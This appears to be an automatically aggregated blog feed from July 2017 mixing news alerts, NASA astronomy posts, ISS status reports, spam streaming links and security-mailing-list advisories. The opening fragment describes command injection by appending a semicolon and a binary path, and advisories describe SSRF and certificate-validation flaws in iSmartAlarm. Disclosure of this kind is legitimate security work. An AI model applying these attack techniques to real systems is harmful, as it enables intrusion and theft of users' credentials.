code execution. Just add a ; and then the full path of a binary: http://ift.tt/2upvTtH After the previous request finish, just access the follow page to see the output http://ift.tt/2upDuIK

Source: Gmail -> IFTTT-> Blogger

Appendix B: Collection of Anonymous Data

Overview of the Deployment Pipeline for Go Applications solution anonymous data collection on AWS.

from Google Alert - anonymous http://ift.tt/2tRZ59r
via IFTTT

NGC 4449: Close up of a Small Galaxy

(xxxedit and linkxxx) Grand spiral galaxies often seem to get all the glory. Their young, blue star clusters and pink star forming regions along sweeping spiral arms are guaranteed to attract attention. But small irregular galaxies form stars too, like NGC 4449, about 12 million light-years distant. Less than 20,000 light-years across, the small island universe is similar in size, and often compared to our Milky Way's satellite galaxy, the Large Magellanic Cloud (LMC). This remarkable Hubble Space Telescope close-up of the well-studied galaxy was reprocessed to highlight the telltale reddish glow of hydrogen gas. The glow traces NGC 4449's widespread star forming regions, some even larger than those in the LMC, with enormous interstellar arcs and bubbles blown by short-lived, massive stars. NGC 4449 is a member of a group of galaxies found in the constellation Canes Venatici. It also holds the distinction of being the first dwarf galaxy with an identified tidal star stream. via NASA http://ift.tt/2ugs7Sm

Anonymous Diner Pays $405 Meal Tab For IE Wildfire Fighters

Colton Fire Chief Tim McHargue tells NPR's Steve Inskeep in an interview from this morning's (Thursday) Morning Edition that an anonymous Good ...

from Google Alert - anonymous http://ift.tt/2t8fzx1
via IFTTT

Tumblr releases anonymous user accounts to 'revenge porn' victim

The New York Post reports Tumblr has released account data of nearly 300 anonymous users to a victim of revenge porn. The users in question ...

from Google Alert - anonymous http://ift.tt/2uWmeYj
via IFTTT

How CIA Agents Covertly Steal Data From Hacked Smartphones (Without Internet)

WikiLeaks has today published the 16th batch of its ongoing Vault 7 leak, this time instead of revealing new malware or hacking tool, the whistleblower organisation has unveiled how CIA operatives stealthy collect and forward stolen data from compromised smartphones. Previously we have reported about several CIA hacking tools, malware and implants used by the agency to remotely infiltrate and

from The Hacker News http://ift.tt/2udxl1N
via IFTTT

I have a new follower on Twitter

Hamish Bayston
PTSD Coach | Live Beyond PTS-Anxiety-Depression
Melbourne, Victoria
https://t.co/Vf2BErCr3q
Following: 7812 - Followers: 8632

July 13, 2017 at 11:46AM via Twitter http://twitter.com/hamishbayston

MP Demands Ban on Anonymous Twitter Accounts

The new Labour MP for East Lothian Martin Whitfield asked if “now is the time to ban anonymous social media accounts”. Last week SNP MEP Alyn ...

from Google Alert - anonymous http://ift.tt/2umYZK7
via IFTTT

ISS Daily Summary Report – 7/12/2017

Sprint Volume of Oxygen Utilized (VO2) Maximum:  The crew set up and performed a Sprint VO2 Max exercise protocol. The subject completed their Flight Day 75 session with assistance from the other USOS crewmember.  The Sprint investigation evaluates the use of high intensity, low volume exercise training to minimize loss of muscle, bone, and cardiovascular function in ISS crewmembers during long-duration missions.  Light Microscopy Module (LMM) Biophysics 3:  The crew retrieved the Biophysics 3 Plate 1 from a Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) and allowed it to thaw before placing it onto the Petri Base and installing the base into the LMM.  The LMM was then placed into the Fluids Integrated Rack (FIR) for a Biophysics science run.  Using the three-dimensional structure of proteins, scientists can determine how they function and how they are involved in disease. Some proteins benefit from being crystallized in microgravity, where they can grow larger and with fewer imperfections. Access to crystals grown on the ISS supports research for a wide range of diseases, as well as microgravity-related problems such as radiation damage, bone loss and muscle atrophy. This investigation identifies which proteins would benefit from crystallization in space. Electrostatic Levitation Furnace (ELF):  The crew exchanged sample holders in the ELF and removed a sample that was lost in the ELF chamber. The ELF is an experimental facility designed to levitate, melt and solidify materials by containerless processing techniques using the Electrostatic Levitation method. With this facility, thermophysical properties of high temperature melts can be measured and solidification from deeply undercooled melts can be achieved. Two Phase Flow:  The crew configured hardware and materials in the Multi-Purpose Small Payload Rack (MSPR) and activated the Two Phase Flow experiment.  Boiling normally removes heat by turning liquid into vapor at the heated surface, and that vapor returns to a liquid by way of a condenser which continues to cycle and make a cooling system. In the microgravity of space, the heat transfer rate must be changed because liquid and bubble behavior is drastically different than on Earth. This investigation seeks to build a database on the heat transfer efficiency of liquids in space that can be used in the design of high-performance thermal management systems for future space platforms. Rodent Research-5 (RR-5) Systemic Therapy of NELL-1 for Osteoporosis:  The two Animal Habitats in use for RR-5 were cleaned and restocked with new food bars.  Because spaceflight has significant and rapid effects on the musculoskeletal system it is important to investigate targeted therapies that could ameliorate some of the detrimental effects of spaceflight. The NELL-1 drug being studied in the RR-5 investigation has the potential to slow or reverse bone loss during spaceflight. Today’s Planned Activities All activities were completed unless otherwise noted. Max Cycle Ergometer w/Vibration Isolation & Stabilization (CEVIS) Portable PFS JEMRMS Final Activation Before JEMRMS Console C/O Analysis of SM atmosphere for Freon using Freon Leak Analyzer/Detector (FIT) [СКВ1] compressor replacement Multi-purpose Small Payload Rack (MSPR) Two-Phase Flow Experiment Equipment Deactivation JEMRMS Console Checkout On MCC Go: [СКВ1] compressor telemetry connector demate JEMRMS Deactivation Preparation After JEMRMS C/O СКВ1] compressor replacement Setup Dosimeter for Static Measurement Multi-purpose Small Payload Rack (MSPR) Combustion Chamber Adapter Plate Removal. Combustion Integrated Rack Alignment Guide Removal Two-Phase Flow Experiment Equipment Setup to MSPR LMM MELFI Sample Retrieve Max Cycle Ergometer w/Vibration Isolation & Stabilization (CEVIS) Portable PFS Partial Stow On MCC Go Mating [СКВ1] compressor telemetry connector [СКВ1] Compressor R&R, Recharging [СКВ1] khladon loop Fluids Integrated Rack Doors Open LMM Biophysics Plate Installation Fluids Integrated Rack Doors Close On-Orbit Hearing Assessment (O-OHA) with EarQ Software Setup and Test Multi-purpose Small Payload Rack (MSPR) Two-Phase Flow Experiment Equipment Activation SM Atmosphere analysis using Freon Leak Analyzer/Detector (ФИТ) On MCC GO ISS O2 Repress from Progress 435 (DC1) СрПК Section 1, initiate Rodent Research Node 2 Camcorder Video Setup Electrostatic Levitation Furnace(ELF) sample Cartridge Retrieval Rodent Research Habitat 3 & 4 Restock Electrostatic Levitation Furnace(ELF) Sample Holder Exchange On MCC GO ISS O2 Repress from Progress 435 (DC1) СРПК Section 1, terminate Electrostatic Levitation Furnace(ELF) Sample Removal Electrostatic Levitation Furnace(ELF) sample Cartridge Installation Countermeasures System (CMS) Max Cycle Ergometer w/Vibration Isolation & Stabilization (CEVIS) Portable PFS Conclude Completed Task List Items Replace KTO when full Ground Activities All activities were completed unless otherwise noted. MBS POA LEE HD Inspection Three-Day Look Ahead: Thursday, 07/13: WORF PEHG/Shutter actuator system install, JEMRMS cable reconfig for BDS checkout, RR access unit cleaning Friday, 07/14: Fluid Shifts, JEM Small Satellite Orbital Deplorer (SSOD) Removal, Optical Coherence Tomography Saturday, 07/15: Housecleaning, Crew Off-Day.  QUICK ISS Status – Environmental Control Group:   Component Status Elektron Off Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On           [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Idle Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Standby Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Full up Trace Contaminant Control System (TCCS) Node 3 Off  

from ISS On-Orbit Status Report http://ift.tt/2uiUZt0
via IFTTT

(L.i.v.e-F.r.e.e)!@!//~Grand Slams Wimbledon Live Tannis 2017 - Anonymous' suggestion - Amplify NI

(L.i.v.e-F.r.e.e)!@!//~Grand Slams Wimbledon Live Tannis 2017.

from Google Alert - anonymous http://ift.tt/2ucPdcY
via IFTTT

Muguruza vs Rybarikova Li.ve Free

Back to THE LIST. Posted by Anonymous - July 13, 2017 1:23 PM ... Anonymous published this page in Share your ideas 2017-07-13 13:23:24 +0100.

from Google Alert - anonymous http://ift.tt/2sTr5Iq
via IFTTT

[LIVE.TV]..Muguruza vs Rybarikova Live Free Semi Final Game

This summary is not available. Please click here to view the post.

Anonymous Woman Covers $405 Dinner Bill For Firefighters

After working to contain the La Cadena Fire in Colton, Calif., 25 firefighters were treated to dinner when an anonymous patron paid $405 to cover their ...

from Google Alert - anonymous http://ift.tt/2thMCKh
via IFTTT

New Ransomware Threatens to Send Your Internet History & Private Pics to All Your Friends

After WannaCry and Petya ransomware outbreaks, a scary (but rather creative) new strain of ransomware is spreading via bogus apps on the Google Play Store, this time targeting Android mobile users. Dubbed LeakerLocker, the Android ransomware does not encrypt files on victim's device, unlike traditional ransomware, rather it secretly collects personal images, messages and browsing history and

from The Hacker News http://ift.tt/2vfQjla
via IFTTT

[InsideNothing] amaranto es liked your post "[FD] DefenseCode Security Advisory: IBM DB2 Command Line Processor Buffer Overflow"

amaranto es liked your post on InsideNothing They thought [FD] DefenseCode Security Advisory: IBM DB2 Command Line Processor Buffer Overflow was pretty awesome. You should go see what they're up to. Maybe you'll like their blog as much as they liked yours! Great posts worth seeing from amaranto es: On the Perception of Dynamic Emotional Expressions About Mountain Bike Training: For All Levels of Performance Want less email? Modify your Notification Options. Moderate comments on the go Check out the mobile WordPress Apps. Thanks for flying with WordPress.com

Source: Gmail -> IFTTT-> Blogger

Researcher Claims Samsung's Tizen OS is Poorly Programmed; Contains 27,000 Bugs!

A researcher has claimed that Samsung's Tizen operating system that runs on millions of Samsung products is so poorly programmed that it could contain nearly 27,000 programming errors, which could also lead to thousands of vulnerabilities. Tizen is a Linux-based open-source operating system backed by Intel and Samsung Electronics, which has been in development since early 2012 and designed

from The Hacker News http://ift.tt/2tPiJTF
via IFTTT

Do not track anonymous submissions if convertion is off

Currently webform submissions ids are stored in a session of an anonymous user despite the fact that form_convert_anonymous is set to FALSE.

from Google Alert - anonymous http://ift.tt/2vfrplB
via IFTTT

Full Moon and Boston Light

This well-planned telephoto timelapse captures July's Full Moon rise across outer Boston Harbor, Massachusetts, planet Earth. In the foreground, the historic terrestrial beacon is known as Boston Light. July's Full Moon is known to some as a Thunder Moon, likely a reference to the sounds of the northern summer month's typically stormy weather. But the eastern sky was clear for this video sequence. Near the horizon, the long sight-line through atmospheric layers filters and refracts the moonlight, causing the rising Moon's reddened color, ragged edges and distorted shape. via NASA http://ift.tt/2t2FdmP

Anonymous class missing references / missing in implementations

Anonymous class missing references / missing in implementations #17139. Open. mjbvz opened this Issue 23 minutes ago · 0 comments ...

from Google Alert - anonymous http://ift.tt/2ubjEQF
via IFTTT

[FD] CVE-2017-11173 Missing anchor in generated regex for rack-cors before 0.4.1 allows a malicious third-party site to perform CORS requests

Missing anchor in generated regex for rack-cors before 0.4.1 allows a malicious third-party site to perform CORS requests. If the configuration were intended to allow only the trusted example.com domain name and not the malicious example.net domain name, then example.com.example.net (as well as example.com-example.net) would be inadvertently allowed.

Source: Gmail -> IFTTT-> Blogger

[FD] [CVE-2017-7727] - SSRF vulnerability in iSmartAlarm

[+] Credits: Ilia Shnaidman [+] Source: http://ift.tt/2tK6Lw4 Vendor: ============= iSmartAlarm, inc. Product: ============= iSmartAlarm Backend iSmartAlarm is one of the leading IoT manufactures in the domain of smart alarm systems. It provides a fully integrated alarm system with siren, smart cameras and locks. It functions like any alarm system, but with the benefits of a connected device: alerts pop up on your phone, offering you full remote control via mobile app wherever you are. Vulnerability Type: ============= Server Side Request Forgery CVE Reference: ============= CVE-2017-7727 Security Issue: ================ Open Redirection - iSmartAlarm is not validating injection inside its api. Attack Vectors: =============== One of the backend api's contains an SSRF which allows me to use it as a proxy. An attacker can use iSmartAlarm's backend as a proxy server and potentially launch outbound attacks. PoC: http://ift.tt/2tfSjZ8 Network Access: =============== Remote Severity: ========= High Disclosure Timeline: ===================================== Jan 30, 2017: Initial contact to vendor Feb 1, 2017: Vendor replied, requesting details Feb 2, 2017: Disclosure to vendor Apr 12, 2017: After vendor didn't replied, I've approached CERT Apr 13, 2017: Confirmed receipt by CERT and assigning CVEs July 05, 2017: Public disclosure

Source: Gmail -> IFTTT-> Blogger

[FD] [CVE-2017-7726] - Missing SSL Certificate Validation in iSmartAlarm

[+] Credits: Ilia Shnaidman [+] Source: http://ift.tt/2tK6Lw4 Vendor: ============= iSmartAlarm, inc. Product: =========================== iSmartAlarm cube - All versions iSmartAlarm is one of the leading IoT manufactures in the domain of smart alarm systems. It provides a fully integrated alarm system with siren, smart cameras and locks. It functions like any alarm system, but with the benefits of a connected device: alerts pop up on your phone, offering you full remote control via mobile app wherever you are. Vulnerability Type: ====================== Missing SSL Certificate Validation CVE Reference: ============== CVE-2017-7726 Security Issue: ================ iSmartAlarm's cube communicates with iSmartAlarm's backend using SSL encryption on port tcp/8443. But the cube does not validate server certificate. Attack Vectors: ================ An attacker can get any password/personal data by setting man in the middle sniffer attack with a fake certificate on port 8443. Network Access: =============== Remote Severity: ========= High Disclosure Timeline: ===================================== Jan 30, 2017: Initial contact to vendor Feb 1, 2017: Vendor replied, requesting details Feb 2, 2017: Disclosure to vendor Apr 12, 2017: After vendor didn't replied, I've approached CERT Apr 13, 2017: Confirmed receipt by CERT and assigning CVEs July 05, 2017: Public disclosure

Source: Gmail -> IFTTT-> Blogger

[FD] ekoparty: Call for Papers 2017! Open!

ekoparty security conference Training September 25-26, 2017 Conference September 27-29, 2017 Buenos Aires, Argentina Submit at: http://cfp.ekoparty.org We are really proud to announce the thirteenth edition of the Ekoparty Security Conference. Once again, in this unique event, security specialist from all over Latin America and the World will have the chance to get acquainted with the most important researches of the year. Ekoparty has become the most important technical conference in Latin America, which keeps offering the deepest knowledges in the field. In this year's edition of ekoparty, we are expecting to bring together more than 3000 security specialists. During the 3-day high voltage lectures, you also can enjoy activities like our famous LOCKPICKING VILLAGE, the WIFI ATTACK LABORATORY, a WARDRIVING around the City, free WORKSHOPS, the most important CAPTURE THE FLAG in Latin America, not forgetting of course, our amazing parties! Again in this thirteenth edition: * ekoparty will recognize the trajectory of Latin American researchers, as also their greatest researches. Stay tuned! The ekoparty organization team is kindly inviting anyone who is interested in showing and sharing his researches and/or developments in the field of Information Security. **Suggested Topics** Topics of interest include, but are not limited to, the following: - Topics of interest include, but are not limited to, the following: - 0 days - Satellite Hacking - Web Security - Privacy - Embedded Systems Technologies - GSM, GPRS and CDMA Security - RFID Security - VoIP Security - Lockpicking - Trumping - Wireless Security - Exploitation - IPv6 Security - Attack and Defense Techniques - Reverse Engineering - Application Security, Testing, Fuzzing - Code Auditing - Virtualization Security - Malicious Code - Databases Security - Viruses, Worms, and Trojans - e-crime, Phishing and Botnets - Malware, Crimeware - e-voting madness - Banking Security - Phreaking - Hardware hacking - Cryptography - Forensics & AntiForensics * All the lectures are going to be simultaneously translated breaking any language barrier. Consideration will be given first to ORIGINAL work and content that has not been duplicated at any other security or networking conference prior to September 1st, 2017. Submissions with technical papers attached will be given preference. **submission types** Full length talks (50 minutes) Turbo talks (20 minutes) Hands-on Workshops (120 minutes) Trainings (1 or 2 days) * Speakers including a Hands-on Workshop proposal earn extra points in the CFP. **important dates** June 16 - CFP is Open July 31 - CFP is Closed August 15 - Notification to Authors September 25 & 26 - ekoparty trainings September 27, 28 & 29 - ekoparty security conference **speakers privileges** Round-trip airfare ticket up to 2.000USD Five star hotel accommodation (3 nights) VIP cocktail for speakers/sponsors Extra ticket to the conference **trainer privileges** 50% net profit of the Training Round-trip airfare ticket up to 2.000USD Five star hotel accommodation (3 nights) VIP cocktail for speakers/sponsors Ticket to the conference **extra activities** We are looking for new activities to be performed in parallel to the conference. Send us your proposal to: organizacion [at] ekoparty.org Submit your abstract here: http://cfp.ekoparty.org Questions? Email cfp [at] ekoparty dot org

Source: Gmail -> IFTTT-> Blogger

Anonymous Work Talk for Silicon Valley

Anonymous Work Talk for Silicon Valley. Users spend 41 mins on Blind, everyday. Uber, Microsoft, Google, Amazon, Facebook, Airbnb, Apple, ...

from Google Alert - anonymous http://ift.tt/2sROiKW
via IFTTT

Over 14 Million Verizon Customers' Data Exposed On Unprotected AWS Server

Verizon, the major telecommunications provider, has suffered a data security breach with over 14 million US customers' personal details exposed on the Internet after NICE Systems, a third-party vendor, mistakenly left the sensitive users’ details open on a server. Chris Vickery, researcher and director of cyber risk research at security firm UpGuard, discovered the exposed data on an

from The Hacker News http://ift.tt/2u9AXBR
via IFTTT

Orioles Poll: Machado, Mancini or Schoop? Who's your pick for MVP of the first half? Vote now! (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Ravens Video: Brandon Williams breaks out spirited rendition of the "Carlton" at fan forum in London (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 7/11/2017

Node 3 Common Cabin Air Assembly (CCAA) Water Separator (WS) Change Out:  Today, the crew replaced the Node 3 CCAA WS. The unit had experienced several water carryover events since May 3, 2017. To assist in preventing these events, ground teams adjusted the Node 3 Low Temperature Loop to reduce condensation rates.  The failing unit esd operational for over 7 years with expected life of 5 years. Ground teams activated the newly repaired CCAA and are receiving good telemetry.     Magnetic 3 Dimensional (Mag 3D) Cell Culturing:  With assistance from the Payload Developer, the crew used a microscope to view Magnetic 3D Biocells. They fixated the biocells and inserted them in to a Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI). This was followed by injections of Magnetic 3D cultures media into the multiwell Biocells. Cell cultures in space spontaneously grow in three dimensions, resulting in characteristics more representative of how cells grow and function in living organisms. But in microgravity, routine manipulation of cell cultures is challenging. This investigation uses magnetized cells and tools to make it easier to handle cells and cultures and to improve the reproducibility of experiments. This approach also makes it possible to generate two-dimensional cultures as controls, and to determine whether biological events in these monolayer cultures result from gravity or substrate attachment. Microbial Monitoring System (MMS): The crew configured the hardware and collected low and high DNA concentration deionized water samples using the Razor Polymerase Chain Reaction (PCR) Microbial Monitoring System.  They then transferred data from the sample tests for downlink.  The MMS supports crew testing and monitoring of the safety of water supplies on the ISS and is also applicable to future space missions where Earth-based testing would be difficult or impossible.  Habitability Walk-through: The crew will record and submit a walk-through video today documenting observations of life onboard ISS and providing insights related to human factors and habitability. The investigation collects observations about the relationship between crew members and their environment on the ISS. These observations can help spacecraft designers understand habitable volume requirements and whether a mission’s duration impacts how much space crewmembers need or not. Today’s Planned Activities All activities were completed unless otherwise noted. Extremophiles Sampling Session B Наклейка русских букв на клавиатуру лэптопа RSК2 VIZIR. Modification of SM panels 114, 116 for СКПФ-УМ P/L URAGAN. Observation and Photography ECON-M. Observation and Photography Calf Volume Measurement Virus Definition File Update on Auxiliary Computer System [ВКС] Laptops CCAA Water Separator R&R Magnetic 3D Cultures MELFI Operations Acoustic Dosimeter Setup Photography of SM SKK cartridge No.9 Combustion Integrated Rack Alignment Guide Install WORF IPEHG Shutter Actuator System Procedure Review Study of veins in lower extremities Magnetic 3D Cultures Microscope Operations Replacement of RSK2 Laptop Shell. HRF1 PC 1 USB Load Installation [Aborted] Search for equipment and procedure review to replace [СКВ1] compressor. Magnetic 3D Cultures Biocells Fixation URAGAN. VSS P/L SW Adjustment and Test Imagery.  Glacier Desiccant Swap Alternate Verification of ИП-1 Flow Sensor Position MELFI Ice Brick Insert Auxiliary Computer Equipment Audit Analysis of SM Atmosphere for Freon Using Freon Leak Analyzer/Detector (ФИТ) Health Maintenance System (HMS) Spaceflight Cognitive Assessment Tool for Windows (WinSCAT) Test Magnetic 3D Cultures Inoculation WORF IPEHG Shutter Actuation System Conference MELFI Rodent Research Transfer Max Cycle Ergometer w/ Vibration Isolation & Stabilization (CEVIS) Portable PFS Partial Set Up Metal Oxide (METOX) Regeneration Habitability Walk-through Video Increment 51 Plaque Hanging Completed Task List Items Microbial Monitoring System On-Board Training Microbial Monitoring System Setup, Preparation, and Sampling  Ground Activities All activities were completed unless otherwise noted. Node 3 CCAA Activation Post R&R Three-Day Look Ahead: Wednesday, 07/12: Max CEVIS session, TPF experiment setup, ELF sample holder exchange, RR Habitat restock Thursday, 07/13: WORF PEHG/Shutter actuator system install, JEMRMS cable reconfig for BDS checkout, RR access unit cleaning Friday, 07/14: Fluid Shifts, JEM Small Satellite Orbital Deplorer (SSOD) Removal, Optical Coherence Tomography

from ISS On-Orbit Status Report http://ift.tt/2t3CWHS
via IFTTT

I have a new follower on Twitter

Slim Palmer
Blowin on that O | #Birdland
Baltimore, MD

Following: 1470 - Followers: 1027

July 12, 2017 at 08:15AM via Twitter http://twitter.com/SlimPalmer22

Katyusha Scanner — Telegram-based Fully Automated SQL Injection Tool

A new powerful hacking tool recently introduced in an underground forum is making rounds these days, allowing anyone to rapidly conduct website scans for SQL injection flaws on a massive scale — all controlled from a smartphone using the Telegram messaging application. Dubbed Katyusha Scanner, the fully automated powerful SQLi vulnerability scanner was first surfaced in April this year when a

from The Hacker News http://ift.tt/2u7ZEhR
via IFTTT

Critical Flaws Found in Windows NTLM Security Protocol – Patch Now

As part of this month's Patch Tuesday, Microsoft has released security patches for a serious privilege escalation vulnerability which affect all versions of its Windows operating system for enterprises released since 2007. Researchers at behavioral firewall specialist Preempt discovered two zero-day vulnerabilities in Windows NTLM security protocols, both of which allow attackers to create a

from The Hacker News http://ift.tt/2sOvOLG
via IFTTT

Enabling a flag adds session cookies to anonymous users

Follow-up to [#2884441]: as mentioned on that issue and [#2865991]: adding any flag using this module adds session cookies to anonymous users.

from Google Alert - anonymous http://ift.tt/2uczPwF
via IFTTT

[FD] SEC Consult SA-20170712-0 :: Multiple critical vulnerabilities in AGFEO smart home ES 5xx/6xx products

SEC Consult Vulnerability Lab Security Advisory < 20170712-0 > ======================================================================= title: Multiple critical vulnerabilities product: AGFEO Smart Home ES 5xx AGFEO Smart Home ES 6xx vulnerable version: at least 1.9b, 1.10 fixed version: 1.12c CVE number: - impact: Critical homepage: https://www.agfeo.de/ found: 2016-12-28 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich http://ift.tt/1mGHMNR ======================================================================= Vendor description:

Source: Gmail -> IFTTT-> Blogger

Messier 63: The Sunflower Galaxy

A bright spiral galaxy of the northern sky, Messier 63 is about 25 million light-years distant in the loyal constellation Canes Venatici. Also cataloged as NGC 5055, the majestic island universe is nearly 100,000 light-years across. That's about the size of our own Milky Way Galaxy. Known by the popular moniker, The Sunflower Galaxy, M63 sports a bright yellowish core in this sharp composite image from space- and ground-based telescopes. Its sweeping blue spiral arms are streaked with cosmic dust lanes and dotted with pink star forming regions. A dominant member of a known galaxy group, M63 has faint, extended features that are likely star streams from tidally disrupted satellite galaxies. M63 shines across the electromagnetic spectrum and is thought to have undergone bursts of intense star formation. via NASA http://ift.tt/2v5Wecs

Nicotine Anonymous Metting

The Southern Oregon meeting of Nicotine Anonymous meets very Monday at 6:30 PM for one hour in the Smullin Center adjacent to Asante Hospital; ...

from Google Alert - anonymous http://ift.tt/2vaKZzt
via IFTTT

OpenLDAP access control without "Service Account" (anonymous bind)

OpenLDAP access control without "Service Account" (anonymous bind) #9314. Open. mash-graz opened this Issue 16 minutes ago · 0 comments ...

from Google Alert - anonymous http://ift.tt/2tFRvjz
via IFTTT

Style: cleanest way to pipe to an Enum.map with an anonymous function

In general I've been sticking to this community style guide http://ift.tt/2gf1pAo, but there's one thing that really hurts ...

from Google Alert - anonymous http://ift.tt/2tbLdok
via IFTTT

Salesforce Tab - Filtering Anonymous Web Activity

In the Marketo tab in Salesforce, there is the Anonymous Web Activity tab that shows the inferred companies that have visited our website. Is there a ...

from Google Alert - anonymous http://ift.tt/2tbGEdJ
via IFTTT

Anonymous woman picks up $400 dinner tab for crew who battled wildfire

COLTON, Calif. - A woman eating at the same California Denny's as a group of firefighters who had been battling a wildfire decided to pick up the ...

from Google Alert - anonymous http://ift.tt/2tbBeja
via IFTTT

Shoes

My feet won't go into that pair. They are too small for me. There's only one thing that I can do. Till I get small or grown. If I want to have some fitting ...

from Google Alert - anonymous http://ift.tt/2tbK0NV
via IFTTT

Craftaholics Anonymous Diy Mason Jar Pendant Light Tutorial With Regard To Attractive House ...

Convert Recessed Light To Pendant Light For House. Bearing in mind your dining area is going to be mainly used for entertaining, it ought to be one ...

from Google Alert - anonymous http://ift.tt/2sNeQgl
via IFTTT

Anonymous's Activity

Anonymous's Activity. Anonymous. Anonymous. Activity. Activity Message List. Wiki-Pages Activity. Loading... Social. Follow @femwiki. License.

from Google Alert - anonymous http://ift.tt/2tEM5Wk
via IFTTT

Russian Financial Cybercriminal Gets Over 9 Years In U.S. Prison

A 29-year-old Russian-born, Los Angeles resident has been sentenced to over nine years in prison for running botnets of half a million computers and stealing and trafficking tens of thousands of credit card numbers on exclusive Russian-speaking cybercriminal forums. Alexander Tverdokhlebov was arrested in February, pleaded guilty on March 31 to wire fraud and on Monday, a federal court

from The Hacker News http://ift.tt/2tKi6L2
via IFTTT

ISS Daily Summary Report – 7/10/2017

Magnetic 3 Dimensional (Mag 3D) Cell Culturing:  The crew prepared hardware in the Microgravity Science Glovebox (MSG) for Mag 3D operations. BioCell Habitat, Mag 3D samples and Cultures Inoculation Kits were removed from the Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) and used to inoculate Multiwell BioCells using Inoculum syringes. Cell cultures in space spontaneously grow in three dimensions, which results in characteristics more representative of how cells grow and function in living organisms. But in microgravity, routine manipulation of cell cultures is challenging. This investigation uses magnetized cells and tools to make it easier to handle cells and cultures and to improve the reproducibility of experiments. This approach also makes it possible to generate two-dimensional cultures as controls, and to determine whether biological events in these monolayer cultures result from gravity or substrate attachment.  Japanese Experiment Module Airlock (JEMAL) Operations:  The crew pressurized the JEMAL this morning and performed a leak check. This is in preparation for installation of the Handhold Experiment Platform (HXP) adapter on the JEMAL Slide Table later this week that will support the Exposed Experiment Handhold Attachment Mechanism (ExHAM) investigation operations planned for next week. Capillary Structures for Exploration Life Support (Capillary Structures):  The crew set up hardware for the Capillary Structures investigation and completed two sorbent demonstrations.  They first demonstrated flow through two microgravity air-liquid contactors in series, then demonstrated flow through two parallel microgravity air-liquid contactor wedges with a viscous fluid.  Current life-support systems on the ISS require special equipment to separate liquids and gases including rotating or moving devices that could cause contamination if they break or fail. Capillary Structures studies a new method using structures of specific shapes to manage fluid and gas mixtures.  It also studies water recycling and carbon dioxide removal, benefitting future efforts to design lightweight, more reliable life support systems for future space missions. On-Board Training (OBT) 50 Soyuz (50S) Emergency Egress Drill:  All three crew members participated in this OBT to practice procedures for departing the Station in the event of an emergency. This drill is scheduled 12 to 14 weeks aboard the ISS and every 2.5 months thereafter. Today’s Planned Activities All activities were completed unless otherwise noted. Test Video Recording for Russia Today TV Channel VIZIR. Modification of SM panels 114, 116 for СКПФ-УМ P/L URAGAN. Observation and Photography ECON-M. Observation and Photography Combustion Integrated Rack Alignment Guide Removal ISS Emergency descent drill. JEM Airlock Pressurization Magnetic 3D Cultures Thawing and Inoculation Preparation WHC Full Fill Magnetic 3D Cultures MELFI Sample Retrieve JEM Airlock Leak Check TOCA Water Recovery System (WRS) Sample Analysis Mating telemetry data connector БСК-1В. БСК-1В Power Switching Unit R&R in Regul-OS Onboard Radio Complex (БРТК – Closeout Ops.) Rodent Research Water Box and Light Check Auxiliary Laptop Computer System Virus Definition File Update Tropical Cyclone Untended Operations СОЖ maintenance Public Affairs Office (PAO) High Definition (HD) Config Columbus Setup HRF1 PC 1 Boot Drive Update Magnetic 3D Cultures Biocells Inoculation Magnetic 3D Cultures Session Cleanup TOCA Sample Data Record RGN Wastewater Storage Tank Assembly (WSTA) Fill WORF Monthly Laptop Connect Glacier Desiccant Swap Tropical Cyclone Hardware Closeout Extravehicular Metal Oxide (METOX) Regeneration Initiation and Verification Completed Task List Items Capillary Structures Sorbent Contactor Demonstration Ground Activities All activities were completed unless otherwise noted. JEMAL pressurization/leak check  Three-Day Look Ahead: Tuesday, 07/11: N3 CCAA water separator R&R, Magnetic 3D Cultures microscope ops, Max CEVIS portable PFS setup Wednesday, 07/12: Max CEVIS session, TPF experiment setup, ELF sample holder exchange, RR Habitat restock Thursday, 07/13: WORF PEHG/Shutter actuator system install, JEMRMS cable reconfig for BDS checkout, RR access unit cleaning QUICK ISS Status – Environmental Control Group:   Component Status Elektron Off Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off           [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Operate Carbon Dioxide Removal Assembly (CDRA) Node 3 Standby Major Constituent Analyzer (MCA) Lab Idle Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Standby Urine Processing Assembly (UPA) Process Trace Contaminant Control System (TCCS) Lab Full up Trace Contaminant Control System (TCCS) Node 3 Off  

from ISS On-Orbit Status Report http://ift.tt/2ue1Gh3
via IFTTT

Adwind RAT Returns! Cross-Platform Malware Targeting Aerospace Industries

Hackers and cyber criminals are becoming dramatically more adept, innovative, and stealthy with each passing day. While other operating systems are more widely in use, cybercriminals have now shifted from traditional activities to more clandestine techniques that come with limitless attack vectors, support for cross platforms and low detection rates. <!-- adsense --> Security researchers have

from The Hacker News http://ift.tt/2sZYO79
via IFTTT

Anonymous access only to Questions in Confluence

Hi all, Is it possible to grant anonymous access only to Questions in Confluence? As far as I know, an anonymous access to Questions is posible.

from Google Alert - anonymous http://ift.tt/2sL1hhJ
via IFTTT

Love Is Everywhere, episode #69 of Beautiful Stories From Anonymous People on Earwolf

Beautiful Stories From Anonymous People #69 July 11, 2017. A mother calls in from a children's hospital while waiting for her daughter's test results.

from Google Alert - anonymous http://ift.tt/2t93ZwY
via IFTTT

[FD] DefenseCode Security Advisory: IBM Informix DB-Access Buffer Overflow

